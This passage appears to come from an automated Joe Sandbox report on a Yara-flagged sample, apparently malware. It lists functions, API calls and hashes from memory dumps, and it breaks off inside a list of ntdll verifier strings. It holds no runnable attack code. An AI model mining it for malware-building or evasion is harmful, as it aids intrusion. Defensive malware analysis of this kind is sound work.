                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: c477fbffae8f4c91e3ee56d3433bdfbd55627d39303b50c6ac5ac8c4e35a3145
                                                                                                                              • Instruction ID: d2f804fbd33e7f92727cac5befaa9dd6899f1d692c1575426cd5012683e347d9
                                                                                                                              • Opcode Fuzzy Hash: c477fbffae8f4c91e3ee56d3433bdfbd55627d39303b50c6ac5ac8c4e35a3145
                                                                                                                              • Instruction Fuzzy Hash: 6690023160180402D1007158481470B001597D0302F56C111B1168555DC62989527671
                                                                                                                              Function 01A22FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: c2d5dbdec7f7e7bf6f8f1e043ed2378a27d16b5aeedbb3c871df1cc660126ddc
                                                                                                                              • Instruction ID: 3f6b8e9ec51c0890db71b4303a2d19c3867be48ff1e8c9bc7c06468ed09f61d5
                                                                                                                              • Opcode Fuzzy Hash: c2d5dbdec7f7e7bf6f8f1e043ed2378a27d16b5aeedbb3c871df1cc660126ddc
                                                                                                                              • Instruction Fuzzy Hash: 06900221611C0042D20075684C14B07001597D0303F56C215B0158554CC91989626621
                                                                                                                              Function 01A22F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6fac5a568b75b9527b7f0bceba557f183d062b2af6acf16c95179e6436b501f0
                                                                                                                              • Instruction ID: e2dea06492df0d8403aff3fe1b3b52050da518b460b6db0d07b0d2d11ca15833
                                                                                                                              • Opcode Fuzzy Hash: 6fac5a568b75b9527b7f0bceba557f183d062b2af6acf16c95179e6436b501f0
                                                                                                                              • Instruction Fuzzy Hash: 7490026174140442D10071584414B060015D7E1301F56C115F1068554DC61DCD537226
                                                                                                                              Function 01A22EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 15a3f4d7318d6915532b324515bc6ca359a4e825a2b5bccdee56aa5d270be660
                                                                                                                              • Instruction ID: eb92ef0cdd945353d4be0367e3884209dacaee45e6155fd2966ecfb54085fe78
                                                                                                                              • Opcode Fuzzy Hash: 15a3f4d7318d6915532b324515bc6ca359a4e825a2b5bccdee56aa5d270be660
                                                                                                                              • Instruction Fuzzy Hash: 5490027160140402D14071584404746001597D0301F56C111B5068554EC65D8ED67765
                                                                                                                              Function 01A22E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4b0b0a33db38829d5c91caa0150357dc20aed6d83d685be4bd11bb521b775196
                                                                                                                              • Instruction ID: 697f7548111cbf2279749d5a2bf76169088c0eda347b40fbf7a8e3cb0a106016
                                                                                                                              • Opcode Fuzzy Hash: 4b0b0a33db38829d5c91caa0150357dc20aed6d83d685be4bd11bb521b775196
                                                                                                                              • Instruction Fuzzy Hash: A4900221A0140502D10171584404716001A97D0241F96C122B1028555ECA298A93B231
                                                                                                                              Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                              • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                              • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                              • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                                                                                                              Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID: &EA
                                                                                                                              • API String ID: 1279760036-1330915590
                                                                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                              • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                              • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                                                                                                              Function 004082D3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 201 4082d3-4082e7 202 4082e9-4082fd call 41b710 201->202 203 40831e-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 201->203 214 40835c-40836e PostThreadMessageW 203->214 215 40838e-408392 203->215 216 408370-40838a call 40a470 214->216 217 40838d 214->217 216->217 217->215
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: fa219bae15b0da85c67c1ee57d7a5492c2843938ffc609705adf7c38e76ccc51
                                                                                                                              • Instruction ID: cccecc87c1ea1b2e49a02ea573b714a3824719a0686cf2f5ae3b0575679c9a49
                                                                                                                              • Opcode Fuzzy Hash: fa219bae15b0da85c67c1ee57d7a5492c2843938ffc609705adf7c38e76ccc51
                                                                                                                              • Instruction Fuzzy Hash: 1F1108B2940328ABDB11A6549C02FEE3358AB84B55F05016EFF44BB2C1DBBD6D0547F5
                                                                                                                              Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 220 408309-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 230 40835c-40836e PostThreadMessageW 220->230 231 40838e-408392 220->231 232 408370-40838a call 40a470 230->232 233 40838d 230->233 232->233 233->231
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 2c69c3419cb1d5e4418932444e8ffbfd0296bf9a379bc45bb6b1a052704e6f0b
                                                                                                                              • Instruction ID: da53683470e229f3deabd99abb76fcc4fe04895a6951e78cd3bde030695561bd
                                                                                                                              • Opcode Fuzzy Hash: 2c69c3419cb1d5e4418932444e8ffbfd0296bf9a379bc45bb6b1a052704e6f0b
                                                                                                                              • Instruction Fuzzy Hash: 8D012871A80318BBE720A6908C43FFE772C5B41B44F04015EFF04BA1C2D6A8290543EA
                                                                                                                              Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 236 408310-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 246 40835c-40836e PostThreadMessageW 236->246 247 40838e-408392 236->247 248 408370-40838a call 40a470 246->248 249 40838d 246->249 248->249 249->247
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                              • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                              • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                              • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                                                                                                              Function 0041A782 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 276 41a782-41a7aa call 41af20 278 41a7af-41a7c4 LookupPrivilegeValueW 276->278
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              • Opcode ID: 6a4f472659cb80a7cb18072fc4a2f20237858cfeaddc240797383a312f94a6be
                                                                                                                              • Instruction ID: ec21d61b55864976568eadb485c386ae057cc9e8f9e3017aea6482977b845cb1
                                                                                                                              • Opcode Fuzzy Hash: 6a4f472659cb80a7cb18072fc4a2f20237858cfeaddc240797383a312f94a6be
                                                                                                                              • Instruction Fuzzy Hash: C9E06DB5600205ABD620DF69DC80EE737AE9F58254F128165FA0DEB241DA39E8518BB4
                                                                                                                              Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 282 41a630-41a661 call 41af20 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                              • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                              • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                                                                                                              Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 285 41a790-41a7a9 286 41a7af-41a7c4 LookupPrivilegeValueW 285->286 287 41a7aa call 41af20 285->287 287->286
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                              • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                              • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                              Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 621844428-0
                                                                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                              • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                              • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                                                              Function 01A22C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
                                                                                                                              • Instruction ID: bea7e14b897860535c0148af998dd2fca7d218b9228ed5d5213523b5794349a9
                                                                                                                              • Opcode Fuzzy Hash: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
                                                                                                                              • Instruction Fuzzy Hash: 15B09B71D015D5C5DA11E7644608717791077D0701F16C172F2034741F473CC5D1F275

                                                                                                                              Non-executed Functions

                                                                                                                              Function 01A62349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2160512332
                                                                                                                              • Opcode ID: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
                                                                                                                              • Instruction ID: 5488dde0dd373dcc2350bfb6eab631f7460f30a87ffdc8dc7293d06694eeb1b9
                                                                                                                              • Opcode Fuzzy Hash: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
                                                                                                                              • Instruction Fuzzy Hash: CE927E71604742ABE721DF28C880B6BBBE8FF84750F04492EFA99D7251D774E845CB92
                                                                                                                              Function 01A18620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A5540A, 01A55496, 01A55519
                                                                                                                              • corrupted critical section, xrefs: 01A554C2
                                                                                                                              • undeleted critical section in freed memory, xrefs: 01A5542B
                                                                                                                              • 8, xrefs: 01A552E3
                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A554E2
                                                                                                                              • Thread identifier, xrefs: 01A5553A
                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A554CE
                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01A55543
                                                                                                                              • Critical section address., xrefs: 01A55502
                                                                                                                              • Address of the debug info found in the active list., xrefs: 01A554AE, 01A554FA
                                                                                                                              • double initialized or corrupted critical section, xrefs: 01A55508
                                                                                                                              • Critical section address, xrefs: 01A55425, 01A554BC, 01A55534
                                                                                                                              • Invalid debug info address of this critical section, xrefs: 01A554B6
                                                                                                                              • Critical section debug info address, xrefs: 01A5541F, 01A5552E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                              • API String ID: 0-2368682639
                                                                                                                              • Opcode ID: 66a0c1c0065a06ce8f9ed200fdebc7fc46cf94a1186b270c9e203834d0b2007b
                                                                                                                              • Instruction ID: 227fd295461faea784efb12e8661b9a8a5dd07abf92621ed53e84936700a2b4b
                                                                                                                              • Opcode Fuzzy Hash: 66a0c1c0065a06ce8f9ed200fdebc7fc46cf94a1186b270c9e203834d0b2007b
                                                                                                                              • Instruction Fuzzy Hash: 7081BBB0E40358EFEB60CF99C845BAEBBB5BB88B14F14411DF949B7241D3B5A941CB60
                                                                                                                              Function 01A129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A52409
                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A52498
                                                                                                                              • @, xrefs: 01A5259B
                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A52412
                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A52602
                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A52624
                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A5261F
                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A525EB
                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A522E4
                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A524C0
                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A52506
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                              • API String ID: 0-4009184096
                                                                                                                              • Opcode ID: 77da295c228e65c52c9b16a71bac2113a08004c1c88b814f1402846f226d8850
                                                                                                                              • Instruction ID: da6fac63fb637f51d106756b1187bfda2f4d7a1d6adcab19e52b2536960bd5f1
                                                                                                                              • Opcode Fuzzy Hash: 77da295c228e65c52c9b16a71bac2113a08004c1c88b814f1402846f226d8850
                                                                                                                              • Instruction Fuzzy Hash: 3B0280B1D042299FDB71DB54CD80BAAB7B8AB54704F0441EAEB4DA7241D7309F84CF59
                                                                                                                              Function 01A88B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                              • API String ID: 0-2515994595
                                                                                                                              • Opcode ID: 65652daa801727dbaa238a80ab06e7a22975cb40c6f9377eecf03d75ba35a757
                                                                                                                              • Instruction ID: e36a34a5b26668fa0687bf05ed26217ad6383db07c233dd370450b9d5377baed
                                                                                                                              • Opcode Fuzzy Hash: 65652daa801727dbaa238a80ab06e7a22975cb40c6f9377eecf03d75ba35a757
                                                                                                                              • Instruction Fuzzy Hash: F651CFB15043119BC329EF588984BABBBE8BFD4640F544A1DE999C3284EB78D608C792
                                                                                                                              Function 01A90274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                              • API String ID: 0-1700792311
                                                                                                                              • Opcode ID: fd4b03bea6f12c555504323a941ede1ed1b2f877fede28cb9437b686fb125e11
                                                                                                                              • Instruction ID: 8eb5a69ca958fc798c00623859a46e8128e9d8d264401c7e229700c5cc15fe8b
                                                                                                                              • Opcode Fuzzy Hash: fd4b03bea6f12c555504323a941ede1ed1b2f877fede28cb9437b686fb125e11
                                                                                                                              • Instruction Fuzzy Hash: 8BD1FD35600682DFDF22DF68C640AAEBBF5FF8A754F098059F58A9B612C7349981CB50
                                                                                                                              Function 01A689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • VerifierDebug, xrefs: 01A68CA5
                                                                                                                              • HandleTraces, xrefs: 01A68C8F
                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A68A3D
                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A68A67
                                                                                                                              • VerifierFlags, xrefs: 01A68C50
